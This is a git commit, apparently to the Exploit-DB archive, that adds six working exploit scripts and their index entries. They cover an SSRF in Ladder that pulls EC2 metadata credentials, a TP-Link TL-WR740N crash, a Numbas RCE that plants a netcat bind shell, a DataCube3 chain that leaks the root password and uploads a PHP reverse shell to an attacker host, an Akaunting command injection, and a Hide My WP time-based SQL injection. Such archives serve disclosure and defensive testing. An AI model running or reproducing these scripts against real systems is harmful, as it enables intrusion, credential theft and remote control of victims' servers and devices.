DB: 2024-03-11

7 changes to exploits/shellcodes/ghdb Ladder v0.0.21 - Server-side request forgery (SSRF) TP-Link TL-WR740N - Buffer Overflow 'DOS' Numbas < v7.3 - Remote Code Execution Akaunting < 3.1.3 - RCE DataCube3 v1.0 - Unrestricted file upload 'RCE' Hide My WP < 6.2.9 - Unauthenticated SQLi
2024-03-11 00:16:24 +00:00 · 2024-03-11 00:16:24 +00:00 · 60a90afc8d
commit 60a90afc8d
parent 0af7c5d561
7 changed files with 537 additions and 0 deletions
--- a/exploits/go/webapps/51869.txt
+++ b/exploits/go/webapps/51869.txt
@ -0,0 +1,18 @@
 # Exploit Title: Ladder v0.0.21 - Server-side request forgery (SSRF)
 # Date: 2024-01-20
 # Exploit Author: @_chebuya
 # Software Link: https://github.com/everywall/ladder
 # Version: v0.0.1 - v0.0.21
 # Tested on: Ubuntu 20.04.6 LTS on AWS EC2 (ami-0fd63e471b04e22d0)
 # CVE: CVE-2024-27620
 # Description: Ladder fails to apply sufficient default restrictions on destination addresses, allowing an attacker to make GET requests to addresses that would typically not be accessible from an external context.  An attacker can access private address ranges, locally listening services, and cloud instance metadata APIs
 import requests
 import json
 target_url = "http://127.0.0.1:8080/api/"
 imdsv1_url = "http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance"
 r = requests.get(target_url + imdsv1_url)
 response_json = json.loads(r.text)
 print(response_json["body"])
--- a/exploits/hardware/webapps/51866.txt
+++ b/exploits/hardware/webapps/51866.txt
@ -0,0 +1,58 @@
 # Exploit Title: TP-Link TL-WR740N - Buffer Overflow 'DOS'
 # Date: 8/12/2023
 # Exploit Author: Anish Feroz (ZEROXINN)
 # Vendor Homepage: http://www.tp-link.com
 # Version: TP-Link TL-WR740n 3.12.11 Build 110915 Rel.40896n
 # Tested on: TP-Link TL-WR740N
 #Description:
 #There exist a buffer overflow vulnerability in TP-Link TL-WR740 router that can allow an attacker to crash the web server running on the router by sending a crafted request. To bring back the http (webserver), a user must physically reboot the router.
 #Usage:
 #python3 target username password
 #change port, if required
 ------------------------------------------------POC-----------------------------------------
 #!/usr/bin/python
 import requests
 from requests.auth import HTTPBasicAuth
 import base64
 def send_request(ip, username, password):
    auth_url = f"http://{ip}:8082"
    target_url = f"http://{ip}:8082/userRpm/PingIframeRpm.htm?ping_addr=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&doType=ping&isNew=new&sendNum=4&pSize=64&overTime=800&trHops=20"
    credentials = f"{username}:{password}"
    encoded_credentials = base64.b64encode(credentials.encode()).decode()
    headers = {
        "Host": f"{ip}:8082",
        "Authorization": f"Basic {encoded_credentials}",
        "Upgrade-Insecure-Requests": "1",
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": f"http://{ip}:8082/userRpm/DiagnosticRpm.htm",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }
    session = requests.Session()
    response = session.get(target_url, headers=headers)
    if response.status_code == 200:
        print("Server Crashed")
        print(response.text)
    else:
        print(f"Script Completed with status code {response.status_code}")
 ip_address = input("Enter IP address of the host: ")
 username = input("Enter username: ")
 password = input("Enter password: ")
 send_request(ip_address, username, password)
--- a/exploits/nodejs/webapps/51867.txt
+++ b/exploits/nodejs/webapps/51867.txt
@ -0,0 +1,167 @@
 # Exploit Title: Numbas < v7.3 - Remote Code Execution
 # Google Dork: N/A
 # Date: March 7th, 2024
 # Exploit Author: Matheus Boschetti
 # Vendor Homepage: https://www.numbas.org.uk/
 # Software Link: https://github.com/numbas/Numbas
 # Version: 7.2 and below
 # Tested on: Linux
 # CVE: CVE-2024-27612
 import sys, requests, re, argparse, subprocess, time
 from bs4 import BeautifulSoup
 s = requests.session()
 def getCSRF(target):
    url = f"http://{target}/"
    req = s.get(url)
    soup = BeautifulSoup(req.text, 'html.parser')
    csrfmiddlewaretoken = soup.find('input', attrs={'name': 'csrfmiddlewaretoken'})['value']
    return csrfmiddlewaretoken
 def createTheme(target):
    # Format request
    csrfmiddlewaretoken = getCSRF(target)
    theme = 'ExampleTheme'
    boundary = '----WebKitFormBoundaryKUMXsLP31HzARUV1'
    data = (
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="csrfmiddlewaretoken"\r\n'
        '\r\n'
        f'{csrfmiddlewaretoken}\r\n'
        f'--{boundary}\r\n'
        'Content-Disposition: form-data; name="name"\r\n'
        '\r\n'
        f'{theme}\r\n'
        f'--{boundary}--\r\n'
    )
    headers = {'Content-Type': f'multipart/form-data; boundary={boundary}',
               'User-Agent': 'Mozilla/5.0',
               'Accept': '*/*',
               'Connection': 'close'}
    # Create theme and return its ID
    req = s.post(f"http://{target}/theme/new/", headers=headers, data=data)
    redir = req.url
    split = redir.split('/')
    id = split[4]
    print(f"\t[i] Theme created with ID {id}")
    return id
 def login(target, user, passwd):
    print("\n[i] Attempting to login...")
    csrfmiddlewaretoken = getCSRF(target)
    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
            'username': user,
            'password': passwd,
            'next': '/'}
    # Login
    login = s.post(f"http://{target}/login/", data=data, allow_redirects=True)
    res = login.text
    if("Logged in as" not in res):
        print("\n\n[!] Login failed!")
        sys.exit(-1)
    # Check if logged and fetch ID
    usermatch = re.search(r'Logged in as <strong>(.*?)</strong>', res)
    if usermatch:
        user = usermatch.group(1)
        idmatch = re.search(r'<a href="/accounts/profile/(.*?)/"><span class="glyphicon glyphicon-user">', res)
        if idmatch:
            id = idmatch.group(1)
            print(f"\t[+] Logged in as \"{user}\" with ID {id}")
 def checkVuln(url):
    print("[i] Checking if target is vulnerable...")
    # Attempt to read files
    themeID = createTheme(url)
    target = f"http://{url}/themes/{themeID}/edit_source?filename=../../../../../../../../../.."
    hname = s.get(f"{target}/etc/hostname")
    ver = s.get(f"{target}/etc/issue")
    hnamesoup = BeautifulSoup(hname.text, 'html.parser')
    versoup = BeautifulSoup(ver.text, 'html.parser')
    hostname = hnamesoup.find('textarea').get_text().strip()
    version = versoup.find('textarea').get_text().strip()
    if len(hostname) < 1:
        print("\n\n[!] Something went wrong - target might not be vulnerable.")
        sys.exit(-1)
    print(f"\n[+] Target \"{hostname}\" is vulnerable!")
    print(f"\t[i] Running: \"{version}\"")
    # Cleanup - delete theme
    print(f"\t\t[i] Cleanup: deleting theme {themeID}...")
    target = f"http://{url}/themes/{themeID}/delete"
    csrfmiddlewaretoken = getCSRF(url)
    data = {'csrfmiddlewaretoken':csrfmiddlewaretoken}
    s.post(target, data=data)
 def replaceInit(target):
    # Overwrite __init__.py with arbitrary code
    rport = '8443'
    payload = f"import subprocess;subprocess.Popen(['nc','-lnvp','{rport}','-e','/bin/bash'])"
    csrfmiddlewaretoken = getCSRF(target)
    filename = '../../../../numbas_editor/numbas/__init__.py'
    themeID = createTheme(target)
    data = {'csrfmiddlewaretoken': csrfmiddlewaretoken,
            'source': payload,
            'filename': filename}
    print("[i] Delivering payload...")
    # Retry 5 times in case something goes wrong...
    for attempt in range(5):
        try:
            s.post(f"http://{target}/themes/{themeID}/edit_source", data=data, timeout=10)
        except Exception as e:
            pass
    # Establish connection to bind shell
    time.sleep(2)
    print(f"\t[+] Payload delivered, establishing connection...\n")
    if ":" in target:
        split = target.split(":")
        ip = split[0]
    else:
        ip = str(target)
    subprocess.Popen(["nc", "-n", ip, rport])
    while True:
        pass
 def main():
    parser = argparse.ArgumentParser()
    if len(sys.argv) <= 1:
        print("\n[!] No option provided!")
        print("\t- check: Passively check if the target is vulnerable by attempting to read files from disk\n\t- exploit: Attempt to actively exploit the target\n")
        print(f"[i] Usage: python3 {sys.argv[0]} <option> --target 172.16.1.5:80 --user example --passwd qwerty")
        sys.exit(-1)
    group = parser.add_mutually_exclusive_group(required=True)
    group.add_argument('action', nargs='?', choices=['check', 'exploit'], help='Action to perform: check or exploit')
    parser.add_argument('--target', help='Target IP:PORT')
    parser.add_argument('--user', help='Username to authenticate')
    parser.add_argument('--passwd', help='Password to authenticate')
    args = parser.parse_args()
    action = args.action
    target = args.target
    user = args.user
    passwd = args.passwd
    print("\n\t\t-==[ CVE-2024-27612: Numbas Remote Code Execution (RCE) ]==-")
    if action == 'check':
        login(target, user, passwd)
        checkVuln(target)
    elif action == 'exploit':
        login(target, user, passwd)
        replaceInit(target)
    else:
        sys.exit(-1)
 if __name__ == "__main__":
    main()
--- a/exploits/php/webapps/51868.txt
+++ b/exploits/php/webapps/51868.txt
@ -0,0 +1,145 @@
 # Exploit Title: DataCube3 v1.0 - Unrestricted file upload 'RCE'
 # Date: 7/28/2022
 # Exploit Author: Samy Younsi - NS Labs (https://neroteam.com)
 # Vendor Homepage: https://www.f-logic.jp
 # Software Link: https://www.f-logic.jp/pdf/support/manual_product/manual_product_datacube3_ver1.0_sc.pdf
 # Version: Ver1.0
 # Tested on: DataCube3 version 1.0 (Ubuntu)
 # CVE : CVE-2024-25830 + CVE-2024-25832
 # Exploit chain reverse shell, information disclosure (root password leak) + unrestricted file upload
 from __future__ import print_function, unicode_literals
 from bs4 import BeautifulSoup
 import argparse
 import requests
 import json
 import urllib3
 import re
 urllib3.disable_warnings()
 def banner():
  dataCube3Logo = """
        ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓▓▓
      ▒▒▒▒▒▒▒▒██        DataCube3   Ver1.0      █F-logic▓▓
      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓
      ▒▒████▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓
      ▒▒▒▒▒▒▒▒██        ████        ████        ██▓▓▓▓▓▓▓▓
      ▒▒▒▒▒▒▒▒██                                ██▓▓████▓▓
      ▒▒▒▒▒▒▒▒██        ██             ██       ██▓▓████▓▓
      ▒▒▒▒▒▒▒▒██        █████████████████       ██▓▓▓▓▓▓▓▓
        ▒▒▒▒▒▒████████████████████████████████████▓▓▓▓▓▓
 \033[1;92mSamy Younsi (Necrum Security Labs)\033[1;m         \033[1;91mDataCube3 exploit chain reverse shell\033[1;m
                FOR EDUCATIONAL PURPOSE ONLY.
  """
  return print('\033[1;94m{}\033[1;m'.format(dataCube3Logo))
 def extractRootPwd(RHOST, RPORT, protocol):
  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
  try:
    response = requests.get(url, allow_redirects=False, verify=False, timeout=20)
    if response.status_code != 302:
      print('[!] \033[1;91mError: DataCube3 web interface is not reachable. Make sure the specified IP is correct.\033[1;m')
      exit()
    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
    scriptTag = str(soup.find_all('script')[12]).replace(' ', '')
    rawLeakedData = re.findall('configData:.*,', scriptTag)[0]
    jsonLeakedData = json.loads('[{}]'.format(rawLeakedData.split('configData:[')[1].split('],')[0]))
    adminPassword = jsonLeakedData[12]['value']
    rootPassword = jsonLeakedData[14]['value']
    print('[INFO] DataCube3 leaked credentials successfully extracted: admin:{} | root:{}.\n[INFO] The target must be vulnerable.'.format(adminPassword, rootPassword))
    return rootPassword
  except:
    print('[ERROR] Can\'t grab the DataCube3 version...')
 def generateAuthCookie(RHOST, RPORT, protocol, rootPassword):
  print('[INFO] Generating DataCube3 auth cookie ...')
  url = '{}://{}:{}/admin/config_all.php'.format(protocol, RHOST, RPORT)
  data = {
    'user_id': 'root',
    'user_pw': rootPassword,
    'login': '%E3%83%AD%E3%82%B0%E3%82%A4%E3%83%B3'
  }
  try:
    response = requests.post(url, data=data, allow_redirects=False, verify=False, timeout=20)
    if response.status_code != 302:
      print('[!] \033[1;91mError: An error occur while trying to get the auth cookie, is the root password correct?\033[1;m')
      exit()
    authCookie = response.cookies.get_dict()
    print('[INFO] Authentication successful! Auth Cookie: {}'.format(authCookie))
    return authCookie
  except:
    print('[ERROR] Can\'t grab the auth cookie, is the root password correct?')
 def extractAccesstime(RHOST, RPORT, LHOST, LPORT, protocol, authCookie):
  print('[INFO] Extracting Accesstime ...')
  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
  try:
    response = requests.get(url, cookies=authCookie, allow_redirects=False, verify=False, timeout=20)
    if response.status_code != 302:
      print('[!] \033[1;91mError: An error occur while trying to get the accesstime value.\033[1;m')
      exit()
    soup = BeautifulSoup(response.content.decode('utf-8'), 'html.parser')
    accessTime = soup.find('input', {'name': 'accesstime'}).get('value')
    print('[INFO] AccessTime value: {}'.format(accessTime))
    return accessTime
  except:
    print('[ERROR] Can\'t grab the accesstime value, is the root password correct?')
 def injectReverseShell(RHOST, RPORT, LHOST, LPORT, protocol, authCookie, accessTime):
  print('[INFO] Injecting PHP reverse shell script ...')
  filename='rvs.php'
  payload = '<?php $sock=fsockopen("{}",{});$proc=proc_open("sh", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);?>'.format(LHOST, LPORT)
  data = '-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="add"\r\n\r\nå<6E><C3A5>ç<EFBFBD><C3A7>è¿½å<C2BD>\xA0\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="addPhoto"; filename="{}"\r\nContent-Type: image/jpeg\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396\r\nContent-Disposition: form-data; name="accesstime"\r\n\r\n{}\r\n-----------------------------113389720123090127612523184396--\r\n'.format(filename, payload, accessTime)
  headers = {
      'Content-Type': 'multipart/form-data; boundary=---------------------------113389720123090127612523184396'
  }
  url = '{}://{}:{}/admin/setting_photo.php'.format(protocol, RHOST, RPORT)
  try:
    response = requests.post(url, cookies=authCookie, headers=headers, data=data, allow_redirects=False, verify=False, timeout=20)
    if response.status_code != 302:
        print('[!] \033[1;91mError: An error occur while trying to upload the PHP reverse shell script.\033[1;m')
        exit()
    shellURL = '{}://{}:{}/images/slideshow/{}'.format(protocol, RHOST, RPORT, filename)
    print('[INFO] PHP reverse shell script successfully uploaded!\n[INFO] SHELL URL: {}'.format(shellURL))
    return shellURL
  except:
    print('[ERROR] Can\'t upload the PHP reverse shell script, is the root password correct?')
 def execReverseShell(shellURL):
  print('[INFO] Executing reverse shell...')
  try:
    response = requests.get(shellURL, allow_redirects=False, verify=False)
    print('[INFO] Reverse shell successfully executed.')
    return
  except Exception as e:
      print('[ERROR] Reverse shell failed. Make sure the DataCube3 device can reach the host {}:{}')
      return False
 def main():
  banner()
  args = parser.parse_args()
  protocol = 'https' if args.RPORT == 443 else 'http'
  rootPassword = extractRootPwd(args.RHOST, args.RPORT, protocol)
  authCookie = generateAuthCookie(args.RHOST, args.RPORT, protocol, rootPassword)
  accessTime = extractAccesstime(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie)
  shellURL = injectReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT, protocol, authCookie, accessTime)
  execReverseShell(shellURL)
 if __name__ == '__main__':
  parser = argparse.ArgumentParser(description='Script PoC that exploit an unauthenticated remote command injection on f-logic DataCube3 devices.', add_help=False)
  parser.add_argument('--RHOST', help='Refers to the IP of the target machine. (f-logic DataCube3 device)', type=str, required=True)
  parser.add_argument('--RPORT', help='Refers to the open port of the target machine. (443 by default)', type=int, required=True)
  parser.add_argument('--LHOST', help='Refers to the IP of your machine.', type=str, required=True)
  parser.add_argument('--LPORT', help='Refers to the open port of your machine.', type=int, required=True)
  main()
--- a/exploits/php/webapps/51870.txt
+++ b/exploits/php/webapps/51870.txt
@ -0,0 +1,122 @@
 # Exploit Title: Akaunting < 3.1.3 - RCE
 # Date: 08/02/2024
 # Exploit Author: u32i@proton.me
 # Vendor Homepage: https://akaunting.com
 # Software Link: https://github.com/akaunting/akaunting
 # Version: <= 3.1.3
 # Tested on: Ubuntu (22.04)
 # CVE : CVE-2024-22836
 #!/usr/bin/python3
 import sys
 import re
 import requests
 import argparse
 def get_company():
 	# print("[INF] Retrieving company id...")
 	res = requests.get(target, headers=headers, cookies=cookies, allow_redirects=False)
 	if res.status_code != 302:
 		print("[ERR] No company id was found!")
 		sys.exit(3)
 	cid = res.headers['Location'].split('/')[-1]
 	if cid == "login":
 		print("[ERR] Invalid session cookie!")
 		sys.exit(7)
 	return cid
 def get_tokens(url):
 	res = requests.get(url, headers=headers, cookies=cookies, allow_redirects=False)
 	search_res = re.search(r"\"csrfToken\"\:\".*\"", res.text)
 	if not search_res:
 		print("[ERR] Couldn't get csrf token")
 		sys.exit(1)
 	data = {}
 	data['csrf_token'] = search_res.group().split(':')[-1:][0].replace('"', '')
 	data['session'] = res.cookies.get('akaunting_session')
 	return data
 def inject_command(cmd):
 	url = f"{target}/{company_id}/wizard/companies"
 	tokens = get_tokens(url)
 	headers.update({"X-Csrf-Token": tokens['csrf_token']})
 	data = {"_token": tokens['csrf_token'], "_method": "POST", "_prefix": "company", "locale": f"en_US && {cmd}"}
 	res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
 	if res.status_code == 200:
 		res_data = res.json()
 		if res_data['error']:
 			print("[ERR] Command injection failed!")
 			sys.exit(4)
 		print("[INF] Command injected!")
 def trigger_rce(app, version = "1.0.0"):
 	print("[INF] Executing the command...")
 	url = f"{target}/{company_id}/apps/install"
 	data = {"alias": app, "version": version, "path": f"apps/{app}/download"}
 	headers.update({"Content-Type":"application/json"})
 	res = requests.post(url, headers=headers, cookies=cookies, json=data, allow_redirects=False)
 	if res.status_code == 200:
 		res_data = res.json()
 		if res_data['error']:
 			search_res = re.search(r">Exit Code\:.*<", res_data['message'])
 			if search_res:
 				print("[ERR] Failed to execute the command")
 				sys.exit(6)
 			print("[ERR] Failed to install the app! no command was executed!")
 			sys.exit(5)
 		print("[INF] Executed successfully!")
 def login(email, password):
 	url = f"{target}/auth/login"
 	tokens = get_tokens(url)
 	cookies.update({
 		'akaunting_session': tokens['session']
 	})
 	data = {
 		"_token": tokens['csrf_token'],
 		"_method": "POST",
 		"email": email,
 		"password": password
 	}
 	req = requests.post(url, headers=headers, cookies=cookies, data=data)
 	res = req.json()
 	if res['error']:
 		print("[ERR] Failed to log in!")
 		sys.exit(8)
 	print("[INF] Logged in")
 	cookies.update({'akaunting_session': req.cookies.get('akaunting_session')})
 def main():
 	inject_command(args.command)
 	trigger_rce(args.alias, args.version)
 if __name__=='__main__':
 	parser = argparse.ArgumentParser()
 	parser.add_argument("-u", "--url", help="target url")
 	parser.add_argument("--email", help="user login email.")
 	parser.add_argument("--password", help="user login password.")
 	parser.add_argument("-i", "--id", type=int, help="company id (optional).")
 	parser.add_argument("-c", "--command", help="command to execute.")
 	parser.add_argument("-a", "--alias", help="app alias, default: paypal-standard", default="paypal-standard")
 	parser.add_argument("-av", "--version", help="app version, default: 3.0.2", default="3.0.2")
 	args = parser.parse_args()
 	headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36"}
 	cookies = {}
 	target = args.url
 	try:
 		login(args.email, args.password)
 		company_id = get_company() if not args.id else args.id
 		main()
 	except:
 		sys.exit(0)
--- a/exploits/php/webapps/51871.txt
+++ b/exploits/php/webapps/51871.txt
@ -0,0 +1,21 @@
 # Exploit Title: Wordpress Plugin Hide My WP < 6.2.9 - Unauthenticated SQLi
 # Publication Date: 2023-01-11
 # Original Researcher: Xenofon Vassilakopoulos
 # Exploit Author: Xenofon Vassilakopoulos
 # Submitter: Xenofon Vassilakopoulos
 # Vendor Homepage: https://wpwave.com/
 # Version: Hide My WP v6.2.8 and prior
 # Tested on: Hide My WP v6.2.7
 # Impact: Database Access
 # CVE: CVE-2022-4681
 # CWE: CWE-89
 # CVSS Score: 8.6 (high)
 ## Description
 The plugin does not properly sanitize and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.
 ## Proof of Concept
 curl -k --location --request GET "http://localhost:10008" --header "X-Forwarded-For: 127.0.0.1'+(select*from(select(sleep(20)))a)+'"
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -2901,6 +2901,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 46508,exploits/freebsd_x86-64/local/46508.rb,"FreeBSD - Intel SYSRET Privilege Escalation (Metasploit)",2019-03-07,Metasploit,local,freebsd_x86-64,,2019-03-07,2019-03-07,1,CVE-2012-0217,Local,,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/468679f9074ee4a7de7624d3440ff6e7f65cf9c2/modules/exploits/freebsd/local/intel_sysret_priv_esc.rb
 51257,exploits/go/webapps/51257.py,"Answerdev 1.0.3 - Account Takeover",2023-04-05,"Eduardo Pérez-Malumbres Cervera",webapps,go,,2023-04-05,2023-04-27,1,CVE-2023-0744,,,,,
 51869,exploits/go/webapps/51869.txt,"Ladder v0.0.21 - Server-side request forgery (SSRF)",2024-03-10,@_chebuya,webapps,go,,2024-03-10,2024-03-10,0,CVE-2024-27620,,,,,
 51734,exploits/go/webapps/51734.py,"Minio 2022-07-29T19-40-48Z - Path traversal",2023-10-09,"Jenson Zhao",webapps,go,,2023-10-09,2023-10-09,0,CVE-2022-35919,,,,,
 51497,exploits/go/webapps/51497.txt,"Pydio Cells 4.1.2 - Cross-Site Scripting (XSS) via File Download",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32751,,,,,
 51498,exploits/go/webapps/51498.txt,"Pydio Cells 4.1.2 - Server-Side Request Forgery",2023-05-31,"RedTeam Pentesting GmbH",webapps,go,,2023-05-31,2023-05-31,0,CVE-2023-32750,,,,,
@ -4919,6 +4920,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47483,exploits/hardware/webapps/47483.py,"TP-Link TL-WR1043ND 2 - Authentication Bypass",2019-10-10,"Uriel Kosayev",webapps,hardware,80,2019-10-10,2019-10-10,0,CVE-2019-6971,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,
 34583,exploits/hardware/webapps/34583.txt,"TP-Link TL-WR340G / TL-WR340GD - Multiple Vulnerabilities",2014-09-08,smash,webapps,hardware,80,2014-09-09,2014-09-09,0,OSVDB-111720;OSVDB-111712;OSVDB-111711;OSVDB-111708;OSVDB-111707;OSVDB-111706;OSVDB-111705;OSVDB-111704;OSVDB-111703;OSVDB-100357;OSVDB-100355,,,,,
 51606,exploits/hardware/webapps/51606.txt,"TP-Link TL-WR740N - Authenticated Directory Transversal",2023-07-19,"Anish Feroz",webapps,hardware,,2023-07-19,2023-07-19,0,,,,,,
 51866,exploits/hardware/webapps/51866.txt,"TP-Link TL-WR740N - Buffer Overflow 'DOS'",2024-03-10,"Anish Feroz",webapps,hardware,,2024-03-10,2024-03-10,0,,,,,,
 43148,exploits/hardware/webapps/43148.txt,"TP-Link TL-WR740N - Cross-Site Scripting",2017-11-16,bl00dy,webapps,hardware,,2017-11-16,2017-11-16,0,,,,,,
 51769,exploits/hardware/webapps/51769.txt,"TP-LINK TL-WR740N - Multiple HTML Injection",2024-02-02,"Shujaat Amin (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
 51768,exploits/hardware/webapps/51768.txt,"TP-Link TL-WR740N - UnAuthenticated Directory Transversal",2024-02-02,"Syed Affan Ahmed (ZEROXINN)",webapps,hardware,,2024-02-02,2024-02-02,0,,,,,,
@ -12383,6 +12385,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 43922,exploits/nodejs/webapps/43922.html,"KeystoneJS < 4.0.0-beta.7 - Cross-Site Request Forgery",2018-01-28,"Saurabh Banawar",webapps,nodejs,,2018-01-28,2018-01-28,0,CVE-2017-16570,,,,,
 49552,exploits/nodejs/webapps/49552.py,"Node.JS - 'node-serialize' Remote Code Execution (2)",2021-02-10,UndeadLarva,webapps,nodejs,,2021-02-10,2021-02-10,0,CVE-2017-5941,,,,,
 50036,exploits/nodejs/webapps/50036.js,"Node.JS - 'node-serialize' Remote Code Execution (3)",2021-06-18,"Beren Kuday GÖRÜN",webapps,nodejs,,2021-06-18,2021-06-18,0,CVE-2017-5941,,,,,
 51867,exploits/nodejs/webapps/51867.txt,"Numbas < v7.3 - Remote Code Execution",2024-03-10,"Matheus Alexandre",webapps,nodejs,,2024-03-10,2024-03-10,0,CVE-2024-27612,,,,,
 50716,exploits/nodejs/webapps/50716.rb,"Strapi CMS 3.0.0-beta.17.4 - Set Password (Unauthenticated) (Metasploit)",2022-02-08,WackyH4cker,webapps,nodejs,,2022-02-08,2022-02-08,0,CVE-2019-18818,,,,,
 13906,exploits/novell/dos/13906.txt,"Netware - SMB Remote Stack Overflow (PoC)",2010-06-17,"laurent gaffie",dos,novell,139,2010-06-16,,1,CVE-2010-2351;OSVDB-65625,,,,,
 19746,exploits/novell/dos/19746.txt,"Novell BorderManager 3.0/3.5 Audit Trail Proxy - Denial of Service",2000-02-04,"Chicken Man",dos,novell,,2000-02-04,2012-07-11,1,CVE-2000-0152;OSVDB-7468,,,,,https://www.securityfocus.com/bid/976/info
@ -13799,6 +13802,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 3752,exploits/php/webapps/3752.txt,"AjPortal2Php - 'PagePrefix' Remote File Inclusion",2007-04-17,"Alkomandoz Hacker",webapps,php,,2007-04-16,,1,OSVDB-37571;CVE-2007-2142;OSVDB-37570;OSVDB-37569;OSVDB-37568;OSVDB-37567;OSVDB-37566;OSVDB-37565,,,,,
 7086,exploits/php/webapps/7086.txt,"AJSquare Free Polling Script - 'DB' Multiple Vulnerabilities",2008-11-10,G4N0K,webapps,php,,2008-11-09,,1,OSVDB-57333;CVE-2008-7046;CVE-2008-7045;OSVDB-49779;CVE-2008-7044,,,,,
 2315,exploits/php/webapps/2315.txt,"Akarru 0.4.3.34 - 'bm_content' Remote File Inclusion",2006-09-06,ddoshomo,webapps,php,,2006-09-05,,1,OSVDB-28566;CVE-2006-4645,,,,,
 51870,exploits/php/webapps/51870.txt,"Akaunting < 3.1.3 - RCE",2024-03-10,u32i,webapps,php,,2024-03-10,2024-03-10,0,CVE-2024-22836,,,,,
 21251,exploits/php/webapps/21251.txt,"akcms 4.2.4 - Information Disclosure",2012-09-11,L0n3ly-H34rT,webapps,php,,2012-09-11,2012-09-16,1,OSVDB-85488,,,,http://www.exploit-db.comakcms4.2.4.tar.gz,
 18293,exploits/php/webapps/18293.txt,"Akiva WebBoard 8.x - SQL Injection",2011-12-30,"Alexander Fuchs",webapps,php,,2011-12-30,2011-12-30,1,OSVDB-86023;CVE-2011-5204;CVE-2011-5203;OSVDB-78069,,,,,
 10924,exploits/php/webapps/10924.txt,"AL-Athkat.2.0 - Cross-Site Scripting",2010-01-02,indoushka,webapps,php,,2010-01-01,,1,,,,,,
@ -16719,6 +16723,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 45807,exploits/php/webapps/45807.txt,"Data Center Audit 2.6.2 - 'username' SQL Injection",2018-11-12,"Ihsan Sencan",webapps,php,80,2018-11-12,2018-11-13,0,,"SQL Injection (SQLi)",,,http://www.exploit-db.comdata_center_audit_v262.zip,
 45831,exploits/php/webapps/45831.txt,"Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin)",2018-11-13,"Ihsan Sencan",webapps,php,,2018-11-13,2018-11-13,0,,"Cross-Site Request Forgery (CSRF)",,,http://www.exploit-db.comdata_center_audit_v262.zip,
 15249,exploits/php/webapps/15249.txt,"Data/File - upload and Management Arbitrary File Upload",2010-10-14,saudi0hacker,webapps,php,,2010-10-14,2010-10-14,1,,,,,http://www.exploit-db.comUploadManagemnt23205.zip,
 51868,exploits/php/webapps/51868.txt,"DataCube3 v1.0 - Unrestricted file upload 'RCE'",2024-03-10,"Samy Younsi - NS Labs",webapps,php,,2024-03-10,2024-03-10,0,CVE-2024-25832;CVE-2024-25830,,,,,
 17367,exploits/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,webapps,php,,2011-06-07,2011-06-07,1,,,,,,
 34418,exploits/php/webapps/34418.txt,"Dataface 1.0 - 'admin.php' Cross-Site Scripting",2010-08-06,MustLive,webapps,php,,2010-08-06,2014-08-26,1,,,,,,https://www.securityfocus.com/bid/42282/info
 32226,exploits/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",webapps,php,,2008-08-12,2014-03-13,1,CVE-2008-4439;OSVDB-48829,,,,,https://www.securityfocus.com/bid/30659/info
@ -19524,6 +19529,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49667,exploits/php/webapps/49667.txt,"Hestia Control Panel 1.3.2 - Arbitrary File Write",2021-03-18,"numan türle",webapps,php,,2021-03-18,2021-03-18,0,,,,,,
